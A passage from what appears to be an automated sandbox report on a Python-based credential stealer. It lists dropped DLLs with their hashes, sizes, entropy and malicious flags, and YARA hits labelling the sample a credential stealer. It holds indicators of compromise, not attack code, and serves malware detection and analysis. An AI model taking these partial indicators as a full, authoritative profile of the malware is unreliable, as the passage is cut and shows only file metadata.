                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
